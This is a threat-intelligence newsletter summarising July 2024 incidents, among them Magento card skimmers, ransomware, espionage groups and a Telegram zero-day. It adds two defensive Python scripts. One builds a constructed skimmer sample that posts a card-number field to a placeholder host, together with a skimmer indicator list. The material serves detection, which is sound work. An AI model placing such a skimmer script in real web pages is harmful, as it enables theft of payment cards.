Intelphreak - 10:30Z July 29th, 2024
Threat Actors Use Cloud to Host Campaigns, LASC Network Compromise, E-Commerce Credit Card Skimmers, Evasive Panda Upgrades, “USDoD” CrowdStrike Breach, Videogame Used to Exfiltrate Data, Telegram Zero-Day, Selenium Grid Crypto Mining, Leidos Leak, New Report on North Korean Cyber Campaigns
Precedence: Routine
BLUF: Latin American Threat Actors Use Cloud Services to Host Phishing & Malware Campaigns, LA Superior Court Responds to Compromise of Their Entire Network, Threat Actors Hide Credit Card Skimmers in E-Commerce Websites, Evasive Panda Upgrades Its Tools & Targets Taiwanese and American Non-Governmental Organizations, Threat Actor “USDoD” Claims to Have Breached CrowdStrike Database of Threat Actor Information, Hacker Group Uses Videogame to Exfiltrate a Terabyte of Assets from Disney, Telegram Zero-Day Allows Delivery of Malicious .apk Files Disguised as Videos, Hackers Use Internet-Facing Selenium Grid Services to Mine for Cryptocurrency, US Prime Contractor Leidos Has Documents Leaked After Diligent Systems Breach, Many Federal Agencies & Companies Have Released Information on Recent North Korean Cybercrime & Intelligence Efforts
BEGIN TEARLINE
[Cybercrime] PINEAPPLE & FLUXROOT abuse Google Cloud for Credential Phishing:
A threat actor based in Latin America has been using serverless Google Cloud projects to host phishing pages that mimic Mercado Pago’s website [1]. The goal is to harvest credentials from users. FLUXROOT has also been seen in the wild using Azure & Dropbox to deploy trojans that target banks. Another actor, PINEAPPLE, has been using Google Cloud to host malware named “Astaroth” targeting users in Brazil. Google has taken down these malicious projects and added the sites to its Safe Browsing list of threats.
AC: The growing trend of using Cloud services to deploy malicious campaigns means it is easier than ever for threat actors to conduct crime with smaller infrastructures. Cloud providers must keep their finger on the pulse to protect their users from malicious uses of their infrastructure. On the user’s end, anti-phishing training is becoming more important for even consumer users. Training yourself to be wary of malicious URLs/domains and testing the links in a sandbox environment first can help you avoid victimization.
[Cybercrime] LA Superior Court Closes All Courts After Ransomware Attack:
The highest court in Los Angeles, the LA Superior Court, had to close 36 courthouses after a ransomware attack took out its information systems [2]. External & internal systems were compromised by the unknown actor. The court is working with several government entities to investigate the event. They said they haven’t found evidence of any data being breached.
AC: The LASC system has been attacked previously, after a phishing attempt successfully compromised credentials. The swift action by the LASC is appropriate and the investigation seems to be comprehensive. The complex nature of this attack on their networks highlights the challenges government entities face. The attack appears to be run-of-the-mill cybercrime, with no known state sponsorship or political motivations.
[Cybercrime] Threat Actors Plant Credit Card Skimmer Malware on Magento Websites:
Skimming malware has been detected on Magento checkout pages that exfiltrates credit card information to an attacker’s network [3]. The malicious domain uses a brand name to appear as if it is sending data to a legitimate source. Due to how the skimmer is designed, it persists after multiple removal attempts. It accomplishes this using temporary swap files created when files are edited via SSH. These swap files are meant to persist in case an editor crashes. Researchers have found copies of the malware among these temporary swap files [4].
AC: This is a very sophisticated attack used for financial gain. The impact of this attack is massive. In an FBI & DHS report, over 2 million Magecart instances have been compromised by this attack [5]. If you have used a website that has Magento or OpenCart plugins, it is best to monitor your cards for unusual activity.
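As an added example (not from the article or the cited researchers), the following Python sweep shows the defender's side of the swap-file persistence described above: it walks a web root, picks out editor swap and backup files, and reports those that still carry script content. The sample web root, file names, placeholder host and indicator strings are constructed for the demonstration; the artifact naming patterns and the indicator list are assumptions, not a signature set taken from the report.

```python
import os
import re
import tempfile
from pathlib import Path

# Editor residue that survives cleaning the served file itself. The naming
# conventions below are assumptions about common Vim, Emacs and nano behaviour.
ARTIFACT_PATTERNS = [
    re.compile(r"^\..*\.sw[a-p]$"),       # Vim swap files: .name.swp, .name.swo, ...
    re.compile(r".+~$"),                  # Emacs/nano backup copies: name~
    re.compile(r"^#.+#$"),                # Emacs auto-save files: #name#
    re.compile(r".+\.(bak|orig|save)$"),  # generic backup suffixes
]

# Content indicators typical of a client-side skimmer (assumed, not taken from
# the cited research): inline script, form harvesting, decoding, exfiltration.
INDICATORS = [
    (b"<script", "inline script block"),
    (b"document.forms", "form access"),
    (b"atob(", "base64 decoding"),
    (b"XMLHttpRequest", "outbound request"),
    (b"fetch(", "outbound request"),
    (b"cc_number", "card field reference"),
]


def is_editor_artifact(name):
    """True when a file name matches one of the editor swap/backup conventions."""
    return any(p.match(name) for p in ARTIFACT_PATTERNS)


def indicators_in(path, max_bytes=4 * 1024 * 1024):
    """Labels of skimmer indicators present in the first max_bytes of the file."""
    data = Path(path).read_bytes()[:max_bytes]
    return sorted({label for needle, label in INDICATORS if needle in data})


def scan_tree(root):
    """Walk root and report editor artifacts whose content carries indicators."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_editor_artifact(name):
                continue
            path = os.path.join(dirpath, name)
            hits = indicators_in(path)
            if hits:
                findings.append({"path": os.path.relpath(path, root),
                                 "indicators": hits})
    return findings


def build_demo_tree(root):
    """Constructed sample web root; none of this is real Magento code."""
    tpl = Path(root) / "app" / "design" / "frontend" / "checkout"
    tpl.mkdir(parents=True)
    # The served template has already been cleaned.
    (tpl / "payment.phtml").write_text('<div class="payment">...</div>\n')
    # A Vim swap file left by an SSH editing session still holds the injected
    # loader. The host name is a placeholder, not a real indicator.
    (tpl / ".payment.phtml.swp").write_bytes(
        b"b0VIM 9.0\x00\x00constructed swap header\x00"
        b"<script>var f=document.forms[0];"
        b"fetch('https://static.example.invalid/c',{method:'POST',body:atob(f.cc_number.value)});"
        b"</script>"
    )
    # A backup copy without any script content must not be reported.
    (tpl / "header.phtml~").write_text("<header>Shop</header>\n")


def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], "->", ", ".join(finding["indicators"]))
```

Run against a real deployment by calling `scan_tree("/path/to/webroot")`; the served files themselves are deliberately out of scope here so that the output isolates exactly the residue a normal clean-up misses.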
[Cybercrime] Evasive Panda Using New Version of Macma Malware & Windows Backdoor:
Symantec has released a report detailing the recent activities of a Chinese-sponsored threat actor going by the names “Evasive Panda”, “Daggerfly”, and “Bronze Highland.” They mainly target Taiwanese organizations and American NGOs in China with cyber espionage campaigns [6]. They have recently updated their MgBot malware, used a macOS backdoor called Macma, and used the Nightdoor Windows backdoor. Their campaigns span almost all major operating systems, even Solaris [7]. A Macma C2 server was attributed to the IP of a known MgBot deployment server.
AC: This comprehensive security research displays the immense infrastructure capabilities of this APT group. They can quickly adapt to changes in many environments. If your organization has systems in Taiwan or China, strict endpoint security measures are highly recommended. Having a Threat Intelligence solution to stay ahead of malicious IPs and malware can also defend against groups such as these.
[Cybercrime] CrowdStrike Threat Actor Database Leaked After Outage:
A threat actor going by the moniker “USDoD” has been seen on leak forums trying to sell a list of threat actors leaked from CrowdStrike after the outage [8]. CrowdStrike has said that these claims are most likely false. The sample data from the leak contains information on APT backgrounds, methodology, and incident reports. The breach allegedly contains over 250M records.
AC: The CrowdStrike outage was a cornucopia for hacking groups. Malicious actors have been seen capitalizing on the event to deploy RATs and malware. A breach such as this would not be outside the realm of possibility. If this breach is legitimate, it could drastically set back efforts to track the behavior of APTs.
[Cybercrime] Hackers Use Trojan in Driving Videogame to Compromise Disney:
The hacking group Nullbulge used the popular driving simulator BeamNG.drive to install a Remote Access Trojan on the system of a senior Disney employee [9]. Over a terabyte of informational assets were exfiltrated from Disney’s systems before Disney cut off access. The malware was delivered through a mod to the game, not through any flaw in the game itself.
AC: This is a very interesting case of compromise. While playing games during down time on corporate systems is common, this event shows the security risks of allowing such use. Modification of acceptable use policy could potentially mitigate the risks of such attacks. However, the organization would have to also accommodate the legitimate uses of running games on corporate computers. Disney also develops games and would not want to enact policy that disrupts this development.
[Research] Zero-day in Telegram for Android:
A zero-day was discovered in the Android version of the popular messaging app Telegram by researchers at ESET [10]. The vulnerability allows malicious actors to deploy custom Android packages (.apk) to users on Telegram that appear as videos. The user would tap on the video, and it would download the malicious .apk onto the user’s device. Luckily, beyond the multiple taps, the user must also allow installation of third-party apps for the vulnerability to be exploited. It has not been exploited in the wild yet; however, threat actors had days to exploit it before its discovery.
AC: Since someone has attempted to sell this zero-day, it is possible it has been exploited in the wild. The multiple user interactions required for full compromise mean this zero-day is not a severe risk. In the solutions you use to manage mobile devices, not allowing the user to install apps from outside the approved app store would mitigate this risk entirely. Even personal users should avoid installing third-party apps on their mobile devices. If you are a developer or researcher, sandbox devices are recommended to stay secure in even the worst-case scenario.
[Research] Hackers Exploit Selenium Automated Web Testing Services for Crypto Mining:
Researchers from the security firm Wiz have discovered a crypto mining campaign targeting exposed instances of Selenium Grid, part of the web testing framework Selenium [11]. Selenium Grid is not meant to be exposed to the internet and defaults to no authentication requirements. This means default installations of Selenium Grid that are accessible via the Internet can be abused by hackers to run mining processes alongside normal processes.
AC: This could all be avoided by hardening internet-facing systems. If software is not designed to be exposed to the public, it presents a high possibility of vulnerability. Anywhere authentication can be enabled on a public system, it should be. The affected systems seem to be mostly poorly configured instances that were not hardened. Tracking trends in resource usage and noting unusual patterns can also be an effective way to catch crypto mining operations.
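The resource-usage monitoring suggested above, carried through as an added example (not code from the article, Wiz or the Selenium project): a robust baseline is learned from a host's quiet period, and only sustained runs above that baseline are reported, which is what separates a miner pinning the CPU from a build or backup burst. The CPU samples are constructed for the demonstration; the window sizes and the 4-sigma / 10-point thresholds are assumptions to tune per environment.

```python
from statistics import median


def robust_baseline(values):
    """Median and scaled MAD of a baseline window (MAD * 1.4826 ~ one std dev)."""
    m = median(values)
    mad = median(abs(v - m) for v in values) * 1.4826
    return m, mad


def flag_sustained_load(series, baseline_len=24, z=4.0, floor=10.0, min_run=6):
    """
    series: ordered list of (timestamp, cpu_percent) samples for one host.

    The first baseline_len samples define normal load. A sample is "high" when
    it exceeds median + max(z * scaled MAD, floor). Only runs of at least
    min_run consecutive high samples are reported: a miner pins the CPU for as
    long as it lives, while builds, backups and page-load bursts fall back
    quickly, so the run length does most of the separating work.
    """
    if len(series) <= baseline_len:
        return []
    m, mad = robust_baseline([v for _, v in series[:baseline_len]])
    threshold = m + max(z * mad, floor)

    alerts, run = [], []

    def close_run():
        if len(run) >= min_run:
            alerts.append({
                "start": run[0][0],
                "end": run[-1][0],
                "peak": max(v for _, v in run),
                "threshold": round(threshold, 1),
            })
        run.clear()

    for ts, v in series[baseline_len:]:
        if v > threshold:
            run.append((ts, v))
        else:
            close_run()
    close_run()  # a plateau that is still ongoing at the end of the window
    return alerts


def constructed_samples():
    """Five-minute CPU samples for one host (constructed, not real telemetry).

    24 quiet samples, a three-sample legitimate burst, then an eight-sample
    plateau near 100 %, then a return to idle.
    """
    quiet = [8, 12, 10, 9, 14, 11] * 4
    burst = [18, 80, 85, 82, 15, 12]
    plateau = [96, 97, 98, 95, 99, 97, 96, 94]
    idle = [14, 11]
    values = quiet + burst + plateau + idle
    return [(5 * i, v) for i, v in enumerate(values)]


def demo():
    return flag_sustained_load(constructed_samples())


if __name__ == "__main__":
    for a in demo():
        print(f"sustained high CPU from t={a['start']} to t={a['end']} "
              f"(peak {a['peak']}%, threshold {a['threshold']}%)")
```

With the constructed data the three-sample burst is ignored and the eight-sample plateau produces one alert; in practice the same function can be fed per-container or per-process CPU series from whatever metrics pipeline already exists, and the baseline window should cover at least one normal business cycle.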
[National Security] Hackers Leak Data From US Defense Contractor Leidos:
Private, internal documents from Leidos have been leaked publicly. Leidos is a prime US federal contractor that handles IT systems (primarily for the US Department of Defense) [12]. Leidos has been open about its investigation, making a statement that they believe the documents were obtained during a compromise of Diligent Corp. in 2023. Leidos used these systems to host documents on internal investigations.
AC: These documents may or may not have significant impacts on US National Security. Since Leidos only stored information on internal investigations on these compromised systems, it is possible nothing that dangerous was leaked. Ultimately this problem stems from the massive number of moving parts that exist in these federal information systems. A subsidiary of Diligent Corp., Steele Compliance Solutions, had an incident that led to the compromise of many Diligent information systems, which led to this leak of confidential documents. It is important to remember that the security of your system also relies on the security of other integrated systems. If your subsidiary was compromised, chances are you could be next.
[National Security] North Korean Infiltration & Cyber Espionage:
North Korea has been carrying out extensive cyber espionage strategies targeting western governments. A North Korean hacker group known as Andariel/Onyx Sleet has been carrying out ransomware attacks against healthcare companies to fund their operations [14]. The actors use a wide variety of tools to execute code remotely, move laterally in a system, and exfiltrate confidential data. The proceeds from these campaigns fund other North Korean cyber espionage operations targeting entities across the globe spanning the industrial, military, government, technology, and energy sectors [15]. North Koreans have even infiltrated IT organizations using AI to enhance stock photography and obtain remote jobs [13]. Recently this occurred at KnowBe4 when they hired an IT intern who turned out to have faked his information. They report no data was breached and they were able to catch the incident quite quickly.
AC: These reports show the lengths that North Korea will go to in order to maintain its intelligence capabilities. They make up for their lack of an industrial economy with advanced cybercrime attacks that fund their military operations. They use these same advanced cyber capabilities to conduct espionage on organizations across many countries including the US, the UK, Japan, India, Taiwan, and even domestically. CISA & the FBI recommend that organizations that handle critical infrastructure take the following actions: apply patches as soon as you can, harden your web servers against remote shells, monitor your endpoints for potentially malicious behavior, and ensure you have strong authentication (especially for remote access).
END TEARLINE
Final Analyst Comments:
It has been a busy week for cybercriminals. The ability of threat groups to advance is growing at an accelerating pace. The ubiquity of cloud services allows attackers to carry out larger campaigns with fewer resources. The immense complexity of many production information systems means a larger attack surface that is harder to keep track of as subsidiaries & vendors become vulnerable. Even something as simple as playing the wrong videogame on the wrong computer can result in massive security incidents. Intelligence systems & processes are becoming more necessary for even smaller organizations that may not have these capabilities. Threat intelligence solutions can help automate some security research and help take some of the burden of security off the organization itself. The extensive cyber campaigns from North Korea show us how the growing tensions between world powers can have severe impacts in cyberspace. A country that is desperate can leverage cyber attacks to gain crucial information on nuclear programs, gain intelligence on military activities, and steal large sums of money to fund its own government. The risks presented by these state actors spill over into the private sector, making them a concern for even normal businesses. Information security is rising to the top of the list of concerns for businesses navigating today’s digital economy.
Analyst: ResidentGood
END REPORT
If you are interested in anything cybersecurity, come check out our Discord.
Sources:
1. https://thehackernews.com/2024/07/pineapple-and-fluxroot-hacker-groups.html?m=1
2. https://www.bleepingcomputer.com/news/security/los-angeles-superior-court-shuts-down-after-ransomware-attack/
3. https://thehackernews.com/2024/07/magento-sites-targeted-with-sneaky.html?m=1
4. https://securityaffairs.com/166073/malware/threat-actors-abused-swap-files-e-skimming.html
5. https://securityaffairs.com/92899/cyber-crime/fbi-cisa-e-skimming-attacks.html
6. https://www.bleepingcomputer.com/news/security/evasive-panda-hackers-deploy-new-macma-macos-backdoor-version/
7. https://securityaffairs.com/166102/apt/daggerfly-macma-macos-backdoor.html
8. https://cyberpress.org/hackers-group-allegedly-leaked-threat-actor-list-from-crowdstrike/
9. https://www.thedrive.com/news/culture/hackers-exploited-a-pc-driving-sim-to-pull-off-massive-disney-data-breach
10. https://www.bleepingcomputer.com/news/security/telegram-zero-day-allowed-sending-malicious-android-apks-as-videos/
11. https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html
12. https://www.reuters.com/technology/cybersecurity/hackers-leak-documents-pentagon-it-services-provider-leidos-bloomberg-news-2024-07-23/
13. https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us
14. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a
15. https://thehackernews.com/2024/07/us-doj-indicts-north-korean-hacker-for.html?m=1